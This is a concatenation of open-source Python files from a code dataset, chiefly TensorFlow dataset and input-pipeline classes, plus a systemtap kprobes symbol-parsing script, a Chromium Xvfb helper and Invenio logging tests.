      if _should_unpack_args(nested_args):
        ret = map_func(*nested_args)
      else:
        ret = map_func(nested_args)
      # If `map_func` returns a list of tensors, `nest.flatten()` and
      # `ops.convert_to_tensor()` would conspire to attempt to stack
      # those tensors into a single tensor, because the customized
      # version of `nest.flatten()` does not recurse into lists. Since
      # it is more likely that the list arose from returning the
      # result of an operation (such as `tf.py_func()`) that returns a
      # list of not-necessarily-stackable tensors, we treat the
      # returned value is a `tuple` instead. A user wishing to pack
      # the return value into a single tensor can use an explicit
      # `tf.stack()` before returning.
      if isinstance(ret, list):
        ret = tuple(ret)
      # Identify components that hold sparse tensor values.
      types = sparse.get_sparse_types(ret)
      # Serialize any sparse tensors and convert result to tensors.
      ret = nest.pack_sequence_as(ret, [
          ops.convert_to_tensor(t)
          for t in nest.flatten(sparse.serialize_sparse_tensors(ret))
      ])
      # Side effect: record the output metadata discovered during tracing
      # so the `output_shapes`/`output_types` properties can report it.
      self._output_shapes = nest.pack_sequence_as(
          types, [t.get_shape() for t in nest.flatten(ret)])
      self._output_types = sparse.wrap_sparse_types(ret, types)
      return nest.flatten(ret)
    self._map_func = tf_map_func
    # Adding the function to the graph presumably forces tracing here,
    # which populates _output_shapes/_output_types — TODO confirm.
    self._map_func.add_to_graph(ops.get_default_graph())
  def _as_variant_tensor(self):
    input_t = self._input_dataset._as_variant_tensor()  # pylint: disable=protected-access
    return gen_dataset_ops.map_dataset(
        input_t,
        self._map_func.captured_inputs,
        f=self._map_func,
        output_types=nest.flatten(
            sparse.unwrap_sparse_types(self.output_types)),
        output_shapes=nest.flatten(self.output_shapes))
  @property
  def output_shapes(self):
    # Determined by tracing `map_func`; see __init__.
    return self._output_shapes
  @property
  def output_types(self):
    return self._output_types
class ParallelMapDataset(MapDataset):
  """A `Dataset` that maps a function over elements in its input in parallel."""

  def __init__(self, input_dataset, map_func, num_parallel_calls):
    """See `Dataset.map()` for details."""
    # The base class builds and traces the map function.
    super(ParallelMapDataset, self).__init__(input_dataset, map_func)
    # Degree of parallelism requested for the map kernel.
    self._num_parallel_calls = ops.convert_to_tensor(
        num_parallel_calls, dtype=dtypes.int32, name="num_parallel_calls")

  def _as_variant_tensor(self):
    # pylint: disable=protected-access
    return gen_dataset_ops.parallel_map_dataset(
        self._input_dataset._as_variant_tensor(),
        self._map_func.captured_inputs,
        f=self._map_func,
        num_parallel_calls=self._num_parallel_calls,
        output_types=nest.flatten(
            sparse.unwrap_sparse_types(self.output_types)),
        output_shapes=nest.flatten(self.output_shapes))
    # pylint: enable=protected-access
class FlatMapDataset(Dataset):
  """A `Dataset` that maps a function over its input and flattens the result."""
  def __init__(self, input_dataset, map_func):
    """See `Dataset.flat_map()` for details."""
    super(FlatMapDataset, self).__init__()
    self._input_dataset = input_dataset
    @function.Defun(
        *nest.flatten(sparse.unwrap_sparse_types(input_dataset.output_types)))
    def tf_map_func(*args):
      """A wrapper for Defun that facilitates shape inference."""
      # Pass in shape information from the input_dataset.
      for arg, shape in zip(args, nest.flatten(input_dataset.output_shapes)):
        arg.set_shape(shape)
      # Re-nest the flat Defun arguments and restore sparse components.
      nested_args = nest.pack_sequence_as(input_dataset.output_types, args)
      nested_args = sparse.deserialize_sparse_tensors(
          nested_args, input_dataset.output_types)
      if _should_unpack_args(nested_args):
        dataset = map_func(*nested_args)
      else:
        dataset = map_func(nested_args)
      if not isinstance(dataset, Dataset):
        raise TypeError("`map_func` must return a `Dataset` object.")
      # Side effect of tracing: record the metadata of the inner dataset so
      # the `output_*` properties can report it.
      self._output_types = dataset.output_types
      self._output_shapes = dataset.output_shapes
      return dataset._as_variant_tensor()  # pylint: disable=protected-access
    self._map_func = tf_map_func
    self._map_func.add_to_graph(ops.get_default_graph())
  def _as_variant_tensor(self):
    return gen_dataset_ops.flat_map_dataset(
        self._input_dataset._as_variant_tensor(),  # pylint: disable=protected-access
        self._map_func.captured_inputs,
        f=self._map_func,
        output_types=nest.flatten(
            sparse.unwrap_sparse_types(self.output_types)),
        output_shapes=nest.flatten(self.output_shapes))
  @property
  def output_shapes(self):
    # Determined by tracing `map_func`; see __init__.
    return self._output_shapes
  @property
  def output_types(self):
    return self._output_types
class InterleaveDataset(Dataset):
  """A `Dataset` that maps a function over its input and interleaves the result.
  """
  def __init__(self, input_dataset, map_func, cycle_length, block_length):
    """See `Dataset.interleave()` for details."""
    super(InterleaveDataset, self).__init__()
    self._input_dataset = input_dataset
    @function.Defun(
        *nest.flatten(sparse.unwrap_sparse_types(input_dataset.output_types)))
    def tf_map_func(*args):
      """A wrapper for Defun that facilitates shape inference."""
      # Pass in shape information from the input_dataset.
      for arg, shape in zip(args, nest.flatten(input_dataset.output_shapes)):
        arg.set_shape(shape)
      # Re-nest the flat Defun arguments and restore sparse components.
      nested_args = nest.pack_sequence_as(input_dataset.output_types, args)
      nested_args = sparse.deserialize_sparse_tensors(
          nested_args, input_dataset.output_types)
      if _should_unpack_args(nested_args):
        dataset = map_func(*nested_args)
      else:
        dataset = map_func(nested_args)
      if not isinstance(dataset, Dataset):
        raise TypeError("`map_func` must return a `Dataset` object.")
      # Side effect of tracing: record the metadata of the inner dataset.
      self._output_types = dataset.output_types
      self._output_shapes = dataset.output_shapes
      return dataset._as_variant_tensor()  # pylint: disable=protected-access
    self._map_func = tf_map_func
    self._map_func.add_to_graph(ops.get_default_graph())
    # cycle_length: how many inner datasets are consumed concurrently;
    # block_length: how many consecutive elements are pulled from each.
    self._cycle_length = ops.convert_to_tensor(
        cycle_length, dtype=dtypes.int64, name="cycle_length")
    self._block_length = ops.convert_to_tensor(
        block_length, dtype=dtypes.int64, name="block_length")
  def _as_variant_tensor(self):
    return gen_dataset_ops.interleave_dataset(
        self._input_dataset._as_variant_tensor(),  # pylint: disable=protected-access
        self._map_func.captured_inputs,
        self._cycle_length,
        self._block_length,
        f=self._map_func,
        output_types=nest.flatten(
            sparse.unwrap_sparse_types(self.output_types)),
        output_shapes=nest.flatten(self.output_shapes))
  @property
  def output_shapes(self):
    # Determined by tracing `map_func`; see __init__.
    return self._output_shapes
  @property
  def output_types(self):
    return self._output_types
class FilterDataset(Dataset):
  """A `Dataset` that filters its input according to a predicate function."""
  def __init__(self, input_dataset, predicate):
    """See `Dataset.filter()` for details."""
    super(FilterDataset, self).__init__()
    self._input_dataset = input_dataset
    @function.Defun(
        *nest.flatten(sparse.unwrap_sparse_types(input_dataset.output_types)))
    def tf_predicate(*args):
      """A wrapper for Defun that facilitates shape inference."""
      # Pass in shape information from the input_dataset.
      for arg, shape in zip(args, nest.flatten(input_dataset.output_shapes)):
        arg.set_shape(shape)
      # Re-nest the flat Defun arguments and restore sparse components.
      nested_args = nest.pack_sequence_as(input_dataset.output_types, args)
      nested_args = sparse.deserialize_sparse_tensors(
          nested_args, input_dataset.output_types)
      if _should_unpack_args(nested_args):
        ret = predicate(*nested_args)
      else:
        ret = predicate(nested_args)
      # The predicate must evaluate to a scalar boolean per element.
      ret = ops.convert_to_tensor(ret, dtype=dtypes.bool)
      if not (ret.dtype == dtypes.bool and
              ret.shape.is_compatible_with(tensor_shape.scalar())):
        raise ValueError("`predicate` must return a scalar boolean tensor.")
      return ret
    self._predicate = tf_predicate
    self._predicate.add_to_graph(ops.get_default_graph())
  def _as_variant_tensor(self):
    return gen_dataset_ops.filter_dataset(
        self._input_dataset._as_variant_tensor(),  # pylint: disable=protected-access
        other_arguments=self._predicate.captured_inputs,
        predicate=self._predicate,
        output_types=nest.flatten(
            sparse.unwrap_sparse_types(self.output_types)),
        output_shapes=nest.flatten(self.output_shapes))
  @property
  def output_shapes(self):
    # Filtering does not change the element structure.
    return self._input_dataset.output_shapes
  @property
  def output_types(self):
    return self._input_dataset.output_types
class PrefetchDataset(Dataset):
  """A `Dataset` that asynchronously prefetches its input."""

  def __init__(self, input_dataset, buffer_size):
    """See `Dataset.prefetch()` for details."""
    super(PrefetchDataset, self).__init__()
    self._input_dataset = input_dataset
    # Maximum number of elements buffered ahead of the consumer.
    self._buffer_size = ops.convert_to_tensor(
        buffer_size, dtype=dtypes.int64, name="buffer_size")

  def _as_variant_tensor(self):
    flat_shapes = nest.flatten(self.output_shapes)
    flat_types = nest.flatten(sparse.unwrap_sparse_types(self.output_types))
    return gen_dataset_ops.prefetch_dataset(
        self._input_dataset._as_variant_tensor(),  # pylint: disable=protected-access
        buffer_size=self._buffer_size,
        output_shapes=flat_shapes,
        output_types=flat_types)

  @property
  def output_shapes(self):
    # Prefetching is transparent: element structure is unchanged.
    return self._input_dataset.output_shapes

  @property
  def output_types(self):
    return self._input_dataset.output_types
| apache-2.0 |
RasPlex/systemtap | scripts/kprobes_test/readelf.py | 15 | 2430 | #!/usr/bin/python
# Copyright (C) 2008 Red Hat Inc.
#
# This file is part of systemtap, and is free software. You can
# redistribute it and/or modify it under the terms of the GNU General
# Public License (GPL); either version 2, or (at your option) any
# later version.
import re
import sys
import os
#import pickle
import subprocess
from config_opts import config_opts
# Read the output of eu-readelf on vmlinux
(sysname, nodename, release, version, machine) = os.uname()
cmd = "eu-readelf --symbols /usr/lib/debug/lib/modules/%s/vmlinux" % release
print "Running", cmd
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
lines = p.stdout.readlines()
p.wait()
if p.returncode != 0:
print >>sys.stderr, "Error: eu-readelf failed."
sys.exit(p.returncode)
# Parse the output
kprobes_text_start = 0
kprobes_text_end = 0
syms = dict()
func_re = re.compile("^\s*\d+:\s+([0-9a-f]+)\s+\d+\s+FUNC\s+\S+\s+\S+\s+\d+\s+(\S+)$")
notype_re = re.compile("^\s*\d+:\s+([0-9a-f]+)\s+\d+\s+NOTYPE\s+\S+\s+\S+\s+\d+\s+(\S+)$")
for line in lines:
match = notype_re.match(line)
if match:
addr = match.group(1)
name = match.group(2)
if name == "__kprobes_text_start":
kprobes_text_start = long(addr, 16)
elif name == "__kprobes_text_end":
kprobes_text_end = long(addr, 16)
continue
match = func_re.match(line)
if match:
addr = match.group(1)
name = match.group(2)
syms[name] = long(addr, 16)
# Now we've parsed everything. Now we need to go back and remove all
# symbols between '__kprobes_text_start' and '__kprobes_text_end',
# since they are already protected from kprobes. We couldn't do this
# in the loop above, since we might encounter symbols that need to be
# removed before we found the start/end of the kprobes section.
if kprobes_text_start == 0 or kprobes_text_end == 0:
print "Error - didn't find kprobes_test_start(%d) or kprobes_text_end(%d)" \
% (kprobes_text_start, kprobes_text_end)
sys.exit(1)
for name in syms.keys():
if syms[name] >= kprobes_text_start and syms[name] < kprobes_text_end:
print "deleting", name
del syms[name]
## Save data
#f = open('%s.syms' % (release), 'w')
#p = pickle.Pickler(f)
#p.dump(syms)
#f.close()
# Write the data out in text format
f = open(config_opts['probes_all'], 'w')
for name in syms.keys():
print >>f, name
f.close()
| gpl-2.0 |
nwjs/chromium.src | build/android/pylib/utils/xvfb.py | 143 | 1551 | # Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0702
import os
import signal
import subprocess
import sys
import time
def _IsLinux():
"""Return True if on Linux; else False."""
return sys.platform.startswith('linux')
class Xvfb(object):
  """Class to start and stop Xvfb if relevant. Nop if not Linux."""

  def __init__(self):
    # PID of the Xvfb process we spawned; 0 means "not running".
    self._pid = 0

  def Start(self):
    """Start Xvfb and set an appropriate DISPLAY environment. Linux only.

    Copied from tools/code_coverage/coverage_posix.py

    Raises:
      Exception: if Xvfb could not be started or confirmed running.
    """
    if not _IsLinux():
      return
    proc = subprocess.Popen(['Xvfb', ':9', '-screen', '0', '1024x768x24',
                             '-ac'],
                            stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    self._pid = proc.pid
    if not self._pid:
      raise Exception('Could not start Xvfb')
    os.environ['DISPLAY'] = ':9'

    # Now confirm, giving a chance for it to start if needed.
    for _ in range(10):
      proc = subprocess.Popen('xdpyinfo >/dev/null', shell=True)
      _, retcode = os.waitpid(proc.pid, 0)
      if retcode == 0:
        break
      time.sleep(0.25)
    if retcode != 0:
      raise Exception('Could not confirm Xvfb happiness')

  def Stop(self):
    """Stop Xvfb if needed. Linux only."""
    if self._pid:
      try:
        os.kill(self._pid, signal.SIGKILL)
      except OSError:
        # Fixed: was a bare `except:` that swallowed every exception
        # (including KeyboardInterrupt). Only "process already gone /
        # not permitted" errors are expected here.
        pass
      # pop() instead of del: do not raise if DISPLAY was already unset.
      os.environ.pop('DISPLAY', None)
      self._pid = 0
| bsd-3-clause |
bruno314/invenio-logging-old | tests/test_invenio_logging.py | 1 | 3090 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015 CERN.
#
# Invenio is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Module tests."""
from __future__ import absolute_import, print_function
import os
from flask import Flask
from flask_babelex import Babel
from invenio_logging.ext_fs import InvenioLoggingFs
from invenio_logging.ext_sentry import InvenioLoggingSentry
import mock
def test_version():
    """Test version import."""
    # Imported inside the test so a broken package import fails this test
    # rather than the whole collection.
    from invenio_logging import __version__
    assert __version__
def test_init(generic_app):
    """Test extension initialization."""
    # raise Exception("test_init")
    # Each extension must register itself on the app's extensions registry.
    ext = InvenioLoggingSentry(generic_app)
    assert 'invenio-logging-sentry' in generic_app.extensions
    ext = InvenioLoggingFs(generic_app)
    assert 'invenio-logging-fs' in generic_app.extensions
    # NOTE(review): the string below is a dead expression statement (leftover
    # code disabled by turning it into a string literal); consider removing
    # it or restoring it as a separate `init_app` test.
    """app = Flask('testapp')
    ext = InvenioLoggingFs()
    assert 'invenio-logging-fs' not in app.extensions
    ext.init_app(app)
    assert 'invenio-logging-fs' in app.extensions"""
def test_sentry(app_for_sentry):
    """Exercise Sentry extension registration (currently non-functional)."""
    # NOTE(review): this test is broken debugging scaffolding — the actual
    # InvenioLoggingSentry registration is commented out, so `simple_mock`
    # is never exercised, and the unconditional `assert False` at the end
    # makes the test always fail. It should either be finished (restore the
    # registration and assert on the mock) or removed/skipped.
    simple_mock = mock.MagicMock(return_value=True)
    # print ("Starting sentry registration")
    # assert False
    # InvenioLoggingSentry(app=app_for_sentry, test_param=simple_mock)
    # Do the logging
    import random
    test_strings = [str(random.random()) for i in range(2)]
    # app_for_sentry.logger.warning(test_strings[0])
    # app_for_sentry.logger.error(test_strings[1])
    print ("CALLCOUNT={} ARGS={}".format(
        simple_mock.call_count, simple_mock.call_args_list))
    assert False
def test_fs(app_for_fs):
    """Test view."""
    InvenioLoggingFs(app_for_fs)
    # Log two random strings so each run checks fresh, unambiguous content.
    import random
    test_strings = [str(random.random()) for i in range(2)]
    app_for_fs.logger.warning(test_strings[0])
    app_for_fs.logger.error(test_strings[1])
    # The extension presumably writes to <instance_path>/<CFG_LOGDIR>/<logger_name>.log
    # — this mirrors how the path is built in InvenioLoggingFs; confirm if it changes.
    log_file_name = os.path.join(app_for_fs.instance_path,
                                 app_for_fs.config.get('CFG_LOGDIR', ''),
                                 app_for_fs.logger_name) + '.log'
    log_file_contents = open(log_file_name).read()
    # Test whether logfiles contain required string
    assert ("WARNING: " + test_strings[0]) in log_file_contents
    assert ("ERROR: " + test_strings[1]) in log_file_contents
ivano666/tensorflow | tensorflow/python/training/input.py | 3 | 36755 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Input pipeline.
Please see the [reading data how-to](../../how_tos/reading_data/index.md)
for context.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import constant_op
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import io_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import variables
from tensorflow.python.training import queue_runner
def match_filenames_once(pattern, name=None):
  """Save the list of files matching pattern, so it is only computed once.
  Args:
    pattern: A file pattern (glob).
    name: A name for the operations (optional).
  Returns:
    A variable that is initialized to the list of files matching pattern.
  """
  with ops.op_scope([pattern], name, "matching_filenames") as name:
    # validate_shape=False: the number of matching files is unknown until
    # the matching_files op actually runs at variable-initialization time.
    return variables.Variable(io_ops.matching_files(pattern), trainable=False,
                              name=name, validate_shape=False)
def limit_epochs(tensor, num_epochs=None, name=None):
  """Returns tensor `num_epochs` times and then raises an `OutOfRange` error.

  Args:
    tensor: Any `Tensor`.
    num_epochs: A positive integer (optional). If specified, limits the number
      of steps the output tensor may be evaluated.
    name: A name for the operations (optional).

  Returns:
    tensor or `OutOfRange`.

  Raises:
    ValueError: if `num_epochs` is invalid.
  """
  # No limit requested: pass the tensor through untouched.
  if num_epochs is None:
    return tensor
  if num_epochs <= 0:
    raise ValueError("num_epochs must be > 0 not %d." % num_epochs)
  with ops.op_scope([tensor], name, "limit_epochs") as name:
    # A non-trainable counter variable tracks how many epochs have been
    # consumed; `count_up_to` raises OutOfRange once the limit is reached.
    initial_count = constant_op.constant(0, dtype=dtypes.int64)
    epochs = variables.Variable(initial_count, name="epochs", trainable=False)
    counter = epochs.count_up_to(num_epochs)
    # Tie the output to the counter so every evaluation ticks it.
    with ops.control_dependencies([counter]):
      return array_ops.identity(tensor, name=name)
def input_producer(input_tensor, element_shape=None, num_epochs=None,
                   shuffle=True, seed=None, capacity=32, shared_name=None,
                   summary_name=None, name=None):
  """Output the rows of `input_tensor` to a queue for an input pipeline.
  Args:
    input_tensor: A tensor with the rows to produce. Must be at least
      one-dimensional. Must either have a fully-defined shape, or
      `element_shape` must be defined.
    element_shape: (Optional.) A `TensorShape` representing the shape of a
      row of `input_tensor`, if it cannot be inferred.
    num_epochs: (Optional.) An integer. If specified `input_producer` produces
      each row of `input_tensor` `num_epochs` times before generating an
      `OutOfRange` error. If not specified, `input_producer` can cycle through
      the rows of `input_tensor` an unlimited number of times.
    shuffle: (Optional.) A boolean. If true, the rows are randomly shuffled
      within each epoch.
    seed: (Optional.) An integer. The seed to use if `shuffle` is true.
    capacity: (Optional.) The capacity of the queue to be used for buffering
      the input.
    shared_name: (Optional.) If set, this queue will be shared under the given
      name across multiple sessions.
    summary_name: (Optional.) If set, a scalar summary for the current queue
      size will be generated, using this name as part of the tag.
    name: (Optional.) A name for queue.
  Returns:
    A queue with the output rows. A `QueueRunner` for the queue is
    added to the current `QUEUE_RUNNER` collection of the current
    graph.
  Raises:
    ValueError: If the shape of the input cannot be inferred from the arguments.
  """
  with ops.op_scope([input_tensor], name, "input_producer"):
    input_tensor = ops.convert_to_tensor(input_tensor, name="input_tensor")
    # Merge the inferred per-row shape with the caller-provided one; they
    # must be jointly fully defined to build the queue.
    element_shape = input_tensor.get_shape()[1:].merge_with(element_shape)
    if not element_shape.is_fully_defined():
      raise ValueError("Either `input_tensor` must have a fully defined shape "
                       "or `element_shape` must be specified")
    # Shuffle first, then apply the epoch limit, so each epoch sees a
    # (re)shuffled ordering of the rows.
    if shuffle:
      input_tensor = random_ops.random_shuffle(input_tensor, seed=seed)
    input_tensor = limit_epochs(input_tensor, num_epochs)
    q = data_flow_ops.FIFOQueue(capacity=capacity,
                                dtypes=[input_tensor.dtype.base_dtype],
                                shapes=[element_shape],
                                shared_name=shared_name, name=name)
    enq = q.enqueue_many([input_tensor])
    # Register a runner so the queue is fed by background threads.
    queue_runner.add_queue_runner(queue_runner.QueueRunner(q, [enq]))
    if summary_name is not None:
      # Report queue fullness as a fraction in [0, 1].
      logging_ops.scalar_summary("queue/%s/%s" % (q.name, summary_name),
                                 math_ops.cast(q.size(), dtypes.float32) *
                                 (1. / capacity))
    return q
def string_input_producer(string_tensor, num_epochs=None, shuffle=True,
                          seed=None, capacity=32, shared_name=None, name=None):
  """Output strings (e.g. filenames) to a queue for an input pipeline.

  Args:
    string_tensor: A 1-D string tensor with the strings to produce.
    num_epochs: An integer (optional). If specified, `string_input_producer`
      produces each string from `string_tensor` `num_epochs` times before
      generating an `OutOfRange` error. If not specified,
      `string_input_producer` can cycle through the strings in `string_tensor`
      an unlimited number of times.
    shuffle: Boolean. If true, the strings are randomly shuffled within each
      epoch.
    seed: An integer (optional). Seed used if shuffle == True.
    capacity: An integer. Sets the queue capacity.
    shared_name: (optional). If set, this queue will be shared under the given
      name across multiple sessions.
    name: A name for the operations (optional).

  Returns:
    A queue with the output strings. A `QueueRunner` for the Queue
    is added to the current `Graph`'s `QUEUE_RUNNER` collection.

  Raises:
    ValueError: If the string_tensor is a null Python list. At runtime,
      will fail with an assertion if string_tensor becomes a null tensor.
  """
  not_null_err = "string_input_producer requires a non-null input tensor"
  # An empty Python list can be rejected eagerly; an empty Tensor can only
  # be detected at run time (see the Assert below).
  if not isinstance(string_tensor, ops.Tensor) and not string_tensor:
    raise ValueError(not_null_err)

  with ops.op_scope([string_tensor], name, "input_producer") as name:
    string_tensor = ops.convert_to_tensor(string_tensor, dtype=dtypes.string)
    # Runtime guard: fail with the same message if the tensor turns out to
    # be empty when the graph executes.
    with ops.control_dependencies([
        logging_ops.Assert(math_ops.greater(array_ops.size(string_tensor), 0),
                           [not_null_err])]):
      string_tensor = array_ops.identity(string_tensor)
    # Delegate queue construction, shuffling and epoch limiting to the
    # generic input_producer; element_shape=[] because each element is a
    # scalar string.
    return input_producer(
        input_tensor=string_tensor,
        element_shape=[],
        num_epochs=num_epochs,
        shuffle=shuffle,
        seed=seed,
        capacity=capacity,
        shared_name=shared_name,
        name=name,
        summary_name="fraction_of_%d_full" % capacity)
def range_input_producer(limit, num_epochs=None, shuffle=True, seed=None,
                         capacity=32, shared_name=None, name=None):
  """Produces the integers from 0 to limit-1 in a queue.

  Args:
    limit: An int32 scalar tensor.
    num_epochs: An integer (optional). If specified, `range_input_producer`
      produces each integer `num_epochs` times before generating an
      OutOfRange error. If not specified, `range_input_producer` can cycle
      through the integers an unlimited number of times.
    shuffle: Boolean. If true, the integers are randomly shuffled within each
      epoch.
    seed: An integer (optional). Seed used if shuffle == True.
    capacity: An integer. Sets the queue capacity.
    shared_name: (optional). If set, this queue will be shared under the given
      name across multiple sessions.
    name: A name for the operations (optional).

  Returns:
    A Queue with the output integers. A `QueueRunner` for the Queue
    is added to the current `Graph`'s `QUEUE_RUNNER` collection.
  """
  with ops.op_scope([limit], name, "input_producer") as name:
    # Materialize [0, limit) as a 1-D tensor and feed it through the
    # generic producer; element_shape=[] since each element is a scalar.
    range_tensor = math_ops.range(limit)
    return input_producer(
        range_tensor, [], num_epochs, shuffle, seed, capacity,
        shared_name, name, "fraction_of_%d_full" % capacity)
def slice_input_producer(tensor_list, num_epochs=None, shuffle=True, seed=None,
                         capacity=32, shared_name=None, name=None):
  """Produces a slice of each `Tensor` in `tensor_list`.

  Implemented using a Queue -- a `QueueRunner` for the Queue
  is added to the current `Graph`'s `QUEUE_RUNNER` collection.

  Args:
    tensor_list: A list of `Tensor` objects. Every `Tensor` in
      `tensor_list` must have the same size in the first dimension.
    num_epochs: An integer (optional). If specified, `slice_input_producer`
      produces each slice `num_epochs` times before generating
      an `OutOfRange` error. If not specified, `slice_input_producer` can cycle
      through the slices an unlimited number of times.
    shuffle: Boolean. If true, the integers are randomly shuffled within each
      epoch.
    seed: An integer (optional). Seed used if shuffle == True.
    capacity: An integer. Sets the queue capacity.
    shared_name: (optional). If set, this queue will be shared under the given
      name across multiple sessions.
    name: A name for the operations (optional).

  Returns:
    A list of tensors, one for each element of `tensor_list`. If the tensor
    in `tensor_list` has shape `[N, a, b, .., z]`, then the corresponding output
    tensor will have shape `[a, b, ..., z]`.

  Raises:
    ValueError: if `slice_input_producer` produces nothing from `tensor_list`.
  """
  with ops.op_scope(tensor_list, name, "input_producer"):
    tensor_list = ops.convert_n_to_tensor_or_indexed_slices(tensor_list)
    if not tensor_list:
      raise ValueError(
          "Expected at least one tensor in slice_input_producer().")
    # A queue of row indices drives the slicing: dequeue one index, then
    # gather that row from every tensor so the slices stay aligned.
    range_size = array_ops.shape(tensor_list[0])[0]
    # TODO(josh11b): Add an assertion that the first dimension of
    # everything in TensorList matches. Maybe just check the inferred shapes?
    queue = range_input_producer(range_size, num_epochs=num_epochs,
                                 shuffle=shuffle, seed=seed, capacity=capacity,
                                 shared_name=shared_name)
    index = queue.dequeue()
    output = [array_ops.gather(t, index) for t in tensor_list]
    return output
# Helpers for the batching functions ------------------------------------------
def _flatten(tensor_list_list):
  """Concatenate a list of tensor lists into a single flat list."""
  flat = []
  for sublist in tensor_list_list:
    flat.extend(sublist)
  return flat
class _SparseMetaData(object):
  """Store information about the Tensor: Is it sparse?, dtype, and rank."""

  def __init__(self, sparse, dtype, rank):
    # dtype and rank are only meaningful when sparse is True.
    self._sparse = sparse
    self._dtype = dtype
    self._rank = rank

  def __eq__(self, other):
    # Dense entries compare equal to each other regardless of dtype/rank;
    # sparse entries must also agree on dtype and have compatible ranks.
    if self._sparse != other._sparse:
      return False
    if not self._sparse:
      return True
    return (self._dtype == other._dtype
            and self._rank.is_compatible_with(other._rank))

  def __ne__(self, other):
    return not self == other

  def __str__(self):
    return "[SparseMetaData(%s, %s, %s)]" % (self.sparse, self.dtype, self.rank)

  def merge_with(self, other):
    """Verify compatibility with `other` and absorb its rank information."""
    if self != other:
      raise ValueError("SparseMetaData objects are incompatible: %s vs. %s"
                       % (self, other))
    if self._sparse:
      self._rank.merge_with(other.rank)
    return self

  @property
  def dtype(self):
    return self._dtype

  @property
  def sparse(self):
    return self._sparse

  @property
  def rank(self):
    return self._rank
def _as_tensor_list(tensors):
  """Return `tensors` as a list, ordering dict values by sorted key."""
  if not isinstance(tensors, dict):
    return tensors
  return [tensors[key] for key in sorted(tensors)]
def _as_tensor_list_list(tensors_list):
  """Convert each element of `tensors_list` via `_as_tensor_list`.

  When the elements are dicts, they must all share one key set so that
  their values line up positionally after conversion.
  """
  if not tensors_list:
    raise ValueError("Expected at least one set of tensors")
  if not isinstance(tensors_list[0], dict):
    return tensors_list
  expected_keys = set(tensors_list[0].keys())
  for tensors in tensors_list[1:]:
    if set(tensors.keys()) != expected_keys:
      raise ValueError("All dictionaries in tensors_list must have "
                       "the same keys")
  return [_as_tensor_list(tensors) for tensors in tensors_list]
def _as_original_type(original_tensors, tensor_list):
  """Repackage `tensor_list` to mirror the structure of `original_tensors`."""
  if not isinstance(original_tensors, dict):
    return tensor_list
  if len(original_tensors) == 1:
    # A single enqueued tensor comes back bare rather than as a one-element
    # list (see b/28117485); re-wrap it so the mapping below works.
    tensor_list = [tensor_list]
  return {key: tensor_list[i]
          for i, key in enumerate(sorted(original_tensors))}
def _serialize_sparse_tensors(tensor_list, enqueue_many):
  """Serialize SparseTensors for feeding into batch, etc.

  Dense tensors pass through unchanged; each SparseTensor is replaced by a
  serialized (dense, string) representation so it can travel through a
  queue, together with metadata needed to deserialize it after dequeue.

  Returns:
    A pair (serialized_list, sparse_info_list) parallel to `tensor_list`.
  """
  def _sparse_meta_data(t):
    # Dense tensors get placeholder metadata (sparse=False).
    if not isinstance(t, ops.SparseTensor):
      return _SparseMetaData(False, None, None)
    rank = t.shape.get_shape().with_rank(1)[0]
    if enqueue_many:
      # The leading batch dimension is not part of a single example's rank.
      rank -= 1
    return _SparseMetaData(sparse=True, dtype=t.dtype, rank=rank)

  def _maybe_serialize(t):
    if not isinstance(t, ops.SparseTensor):
      return t
    # serialize_many_sparse handles a batch of examples per tensor.
    return (sparse_ops.serialize_many_sparse(t) if enqueue_many
            else sparse_ops.serialize_sparse(t))

  serialized_list = [_maybe_serialize(t) for t in tensor_list]
  sparse_info_list = [_sparse_meta_data(t) for t in tensor_list]
  return serialized_list, sparse_info_list
def _serialize_sparse_tensors_join(tensor_list_list, enqueue_many):
  """Serialize SparseTensors for feeding into batch_join, etc.

  Every inner list must agree with the first on which positions hold sparse
  tensors (and their dtype/compatible rank); otherwise ValueError is raised.
  """
  (s0, sparse_info_list) = _serialize_sparse_tensors(
      tensor_list_list[0], enqueue_many)
  serialized_list_list = [s0]
  for tensor_list in tensor_list_list[1:]:
    s, sparse_info_candidate = _serialize_sparse_tensors(
        tensor_list, enqueue_many)
    if sparse_info_list != sparse_info_candidate:
      raise ValueError("Inconsistent SparseTensors list: %s vs. %s"
                       % (tensor_list_list[0], tensor_list))
    # merge_with refines rank information accumulated across the lists.
    sparse_info_list = [
        info.merge_with(candidate)
        for (info, candidate) in zip(sparse_info_list, sparse_info_candidate)]
    serialized_list_list.append(s)
  return (serialized_list_list, sparse_info_list)
def _deserialize_sparse_tensors(serialized_list, sparse_info_list):
  """Deserialize SparseTensors after dequeue in batch, batch_join, etc."""
  # A lone dequeued tensor arrives unwrapped; normalize it to a sequence
  # here and unwrap again before returning.
